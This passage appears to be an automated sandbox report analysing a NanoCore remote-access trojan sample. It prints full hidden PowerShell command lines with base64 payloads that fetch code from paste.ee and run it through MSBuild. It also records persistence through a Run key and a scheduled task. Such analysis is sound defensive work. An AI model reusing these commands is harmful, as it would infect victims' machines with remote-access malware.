AHcAQgBOAEEARwBrAEEAWQB3AEI
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Ep ByPass -win 1 /noP -nolOgO -noNinteRacTi $check=Get-Process output -ErrorAction SilentlyContinue;if ($check -eq $null) { Powershell.exe -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHkAYQBFAHoARgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBAAEAAIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AagBLAHcAMQBoACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAGsALgBIAGEAYwBrAGkAdAB1AHAAXQA6ADoAZQB4AGUAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA; }else{ exit;}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -eP BYPasS /nOp -nolOgO -win 1 -noNinteRacTi /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHkAYQBFAHoARgAnACkALgBSAGUAcABsAGEAYwBlACgAIgBAAEAAIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AagBLAHcAMQBoACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAGsALgBIAGEAYwBrAGkAdAB1AHAAXQA6ADoAZQB4AGUAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\GgNhpv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Users\user\Desktop\GgNhpv.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
PE file contains a COM descriptor data directoryShow sources
Source: GgNhpv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: GgNhpv.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbolsShow sources
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: wpasv.exe, wpasv.exe.15.dr
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256 source: GgNhpv.exe, 00000000.00000003.797888702.000000001B03D000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: GgNhpv.exe, 00000000.00000003.797888702.000000001B03D000.00000004.00000001.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: wpasv.exe, 00000010.00000002.987382069.0000000000EB2000.00000002.00020000.sdmp, wpasv.exe, 00000012.00000000.1010762421.0000000000822000.00000002.00020000.sdmp, wpasv.exe.15.dr
Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp
Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp
Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: MSBuild.exe, 0000000F.00000002.1183790232.0000000003C13000.00000004.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpackerShow sources
Source: 15.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 15.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -windowstyle hidden -ExecutionPolicy Bypass PowERsHELl.`ExE -ExecutionPolicy bypass /e JAByAGUAZwAgAD0AIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAGMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuADsASQBmACAAKAAkAHIAZQBnACAALQBNAGEAdABjAGgAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAVwBpAG4AZABvAHcAcwAgADEAMAAnACkAIAB7ACQAZAB0AD0AIAAoAFsARABhAHQAZQBUAGkAbQBlAF0AOgA6AE4AbwB3ACkAOwAkAGQAdQByAGEAdABpAG8AbgAgAD0AIAAkAGQAdAAuAEEAZABkAFkAZQBhAHIAcwAoADIANQApACAALQAkAGQAdAA7ACQAYQBjAHQAaQBvAG4AIAAgACAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBjAG0AZAAuAGUAeABlACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ARQBwACAAQgB5AFAAYQBzAHMAIAAtAHcAaQBuACAAMQAgAC8AbgBvAFAAIAAtAG4AbwBsAE8AZwBPACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgACQAYwBoAGUAYwBrAD0ARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAbwB1AHQAcAB1AHQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBpAGYAIAAoACQAYwBoAGUAYwBrACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsAIAAgAFAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AZQBQACAAQgBZAFAAYQBzAFMAIAAvAG4ATwBwACAALQBuAG8AbABPAGcATwAgAC0AdwBpAG4AIAAxACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgAC8AZQAgAEoAQQBCAHkAQQBHAFUAQQBaAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEMAYwBBAGUAdwBBAHkAQQBIADAAQQBlAHcAQQB3AEEASAAwAEEAZQB3AEEAeABBAEgAMABBAGUAdwBBAHoAQQBIADAAQQBKAHcAQQB0AEEARwBZAEEASgB3AEIAawBBAEYATQBBAGQAQQBBAG4AQQBDAHcAQQBKAHcAQgB5AEEARwBrAEEAYgBnAEEAbgBBAEMAdwBBAEgAQwBCAGcAQQBFAFEAQQBZAEEAQgB2AEEARwBBAEEAZAB3AEIAdQBBAEcAQQBBAGIAQQBCAGcAQQBHADgAQQBZAFEAQQBkAEkAQwB3AEEASgB3AEIAbgBBAEMAYwBBAEsAUQBBADcAQQBGAHMAQQBkAGcAQgB2AEEARwBrAEEAWgBBAEIAZABBAEMAQQBBAFcAdwBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAFoAUQBCAG0AQQBHAHcAQQBaAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAEIAQQBIAE0AQQBjAHcAQgBsAEEARwAwAEEAWQBnAEIAcwBBAEgAawBBAFgAUQBBADYAQQBEAG8AQQBUAEEAQgB2AEEARwBFAEEAWgBBAEIAWABBAEcAawBBAGQAQQBCAG8AQQBGAEEAQQBZAFEAQgB5AEEASABRAEEAYQBRAEIAaABBAEcAdwBBAFQAZwBCAGgAQQBHADAAQQBaAFEAQQBvAEEAQwBjAEEAVABRAEIAcABBAEcATQBBAGMAZwBCAHYAQQBIAE0AQQBiAHcAQgBtAEEASABRAEEATABnAEIAVwBBAEcAawBBAGMAdwBCADEAQQBHAEUAQQBiAEEAQgBDAEEARwBFAEEAYwB3AEIAcABBAEcATQBBAEoAdwBBAHAAQQBEAHMAQQBKAEEAQgBtAEEARwBvAEEAUABRAEIAYgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEMANABBAFYAZwBCAHAAQQBIAE0AQQBkAFEAQgBoAEEARwB3AEEAUQBnAEIAaABBAEgATQBBAGEAUQBCAGoAQQBDADQAQQBTAFEAQgB1AEEASABRAEEAWgBRAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgAwAEEATwBnAEEANgBBAEUATQBBAFkAUQBCAHMAQQBHAHcAQQBRAGcAQgA1AEEARwA0AEEAWQBRAEIAdABBAEcAVQBBAEsAQQBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVAB3AEIAaQBBAEcAbwBBAFoAUQBCAGoAQQBIAFEAQQBJAEEAQQBjAEkARwBBAEEAVABnAEIAZwBBAEcAVQBBAFkAQQBCAFUAQQBHAEEAQQBMAGcAQgBnAEEARgBjAEEAWQBBAEIAbABBAEcAQQBBAFEAZwBCAGcAQQBFAE0AQQBZAEEAQgBzAEEARwBBAEEAYQBRAEIAZwBBAEcAVQBBAFkAQQBCAE8AQQBHAEEAQQBWAEEAQQBkAEkAQwBrAEEATABBAEEAawBBAEgASQBBAFoAUQBCAG4AQQBDAHcAQQBXA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -windowstyle hidden -ExecutionPolicy Bypass PowERsHELl.`ExE -ExecutionPolicy bypass /e JAByAGUAZwAgAD0AIAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAGMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBDAGEAcAB0AGkAbwBuADsASQBmACAAKAAkAHIAZQBnACAALQBNAGEAdABjAGgAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAVwBpAG4AZABvAHcAcwAgADEAMAAnACkAIAB7ACQAZAB0AD0AIAAoAFsARABhAHQAZQBUAGkAbQBlAF0AOgA6AE4AbwB3ACkAOwAkAGQAdQByAGEAdABpAG8AbgAgAD0AIAAkAGQAdAAuAEEAZABkAFkAZQBhAHIAcwAoADIANQApACAALQAkAGQAdAA7ACQAYQBjAHQAaQBvAG4AIAAgACAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBjAG0AZAAuAGUAeABlACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALwBjACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ARQBwACAAQgB5AFAAYQBzAHMAIAAtAHcAaQBuACAAMQAgAC8AbgBvAFAAIAAtAG4AbwBsAE8AZwBPACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgACQAYwBoAGUAYwBrAD0ARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAbwB1AHQAcAB1AHQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwBpAGYAIAAoACQAYwBoAGUAYwBrACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsAIAAgAFAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AZQBQACAAQgBZAFAAYQBzAFMAIAAvAG4ATwBwACAALQBuAG8AbABPAGcATwAgAC0AdwBpAG4AIAAxACAALQBuAG8ATgBpAG4AdABlAFIAYQBjAFQAaQAgAC8AZQAgAEoAQQBCAHkAQQBHAFUAQQBaAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEMAYwBBAGUAdwBBAHkAQQBIADAAQQBlAHcAQQB3AEEASAAwAEEAZQB3AEEAeABBAEgAMABBAGUAdwBBAHoAQQBIADAAQQBKAHcAQQB0AEEARwBZAEEASgB3AEIAawBBAEYATQBBAGQAQQBBAG4AQQBDAHcAQQBKAHcAQgB5AEEARwBrAEEAYgBnAEEAbgBBAEMAdwBBAEgAQwBCAGcAQQBFAFEAQQBZAEEAQgB2AEEARwBBAEEAZAB3AEIAdQBBAEcAQQBBAGIAQQBCAGcAQQBHADgAQQBZAFEAQQBkAEkAQwB3AEEASgB3AEIAbgBBAEMAYwBBAEsAUQBBADcAQQBGAHMAQQBkAGcAQgB2AEEARwBrAEEAWgBBAEIAZABBAEMAQQBBAFcAdwBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAFoAUQBCAG0AQQBHAHcAQQBaAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAEIAQQBIAE0AQQBjAHcAQgBsAEEARwAwAEEAWQBnAEIAcwBBAEgAawBBAFgAUQBBADYAQQBEAG8AQQBUAEEAQgB2AEEARwBFAEEAWgBBAEIAWABBAEcAawBBAGQAQQBCAG8AQQBGAEEAQQBZAFEAQgB5AEEASABRAEEAYQBRAEIAaABBAEcAdwBBAFQAZwBCAGgAQQBHADAAQQBaAFEAQQBvAEEAQwBjAEEAVABRAEIAcABBAEcATQBBAGMAZwBCAHYAQQBIAE0AQQBiAHcAQgBtAEEASABRAEEATABnAEIAVwBBAEcAawBBAGMAdwBCADEAQQBHAEUAQQBiAEEAQgBDAEEARwBFAEEAYwB3AEIAcABBAEcATQBBAEoAdwBBAHAAQQBEAHMAQQBKAEEAQgBtAEEARwBvAEEAUABRAEIAYgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEMANABBAFYAZwBCAHAAQQBIAE0AQQBkAFEAQgBoAEEARwB3AEEAUQBnAEIAaABBAEgATQBBAGEAUQBCAGoAQQBDADQAQQBTAFEAQgB1AEEASABRAEEAWgBRAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgAwAEEATwBnAEEANgBBAEUATQBBAFkAUQBCAHMAQQBHAHcAQQBRAGcAQgA1AEEARwA0AEEAWQBRAEIAdABBAEcAVQBBAEsAQQBBAG8AQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVAB3AEIAaQBBAEcAbwBBAFoAUQBCAGoAQQBIAFEAQQBJAEEAQQBjAEkARwBBAEEAVABnAEIAZwBBAEcAVQBBAFkAQQBCAFUAQQBHAEEAQQBMAGcAQgBnAEEARgBjAEEAWQBBAEIAbABBAEcAQQBBAFEAZwBCAGcAQQBFAE0AQQBZAEEAQgBzAEEARwBBAEEAYQBRAEIAZwBBAEcAVQBBAFkAQQBCAE8AQQBHAEEAQQBWAEEAQQBkAEkAQwBrAEEATABBAEEAawBBAEgASQBBAFoAUQBCAG4AQQBDAHcAQQBXA
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\GgNhpv.exeCode function: 0_2_00007FF7F9A4BA21 push ebp; iretd 0_2_00007FF7F9A4BAB8
Source: C:\Users\user\Desktop\GgNhpv.exeCode function: 0_2_00007FF7F9A4B724 push ebp; iretd 0_2_00007FF7F9A4BAB8
Source: C:\Users\user\Desktop\GgNhpv.exeCode function: 0_2_00007FF7F9A4B448 push eax; retf 0_2_00007FF7F9A4B461
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02B2A20C push FFFFFF8Bh; iretd 15_2_02B2A1CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02B269FA push esp; retf 15_2_02B26A01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_02B269F8 pushad ; retf 15_2_02B269F9
Binary may include packed or encrypted codeShow sources
Source: initial sampleStatic PE information: section name: .text entropy: 7.546914296
.NET source code contains many randomly named methodsShow sources
Source: 15.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 15.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Roaming\59407D34-C8C5-44DF-A766-BA8A11CB1CB0\WPA Service\wpasv.exeJump to dropped file

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WPA Service
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WPA Service

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe:Zone.Identifier read attributes | delete
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\GgNhpv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
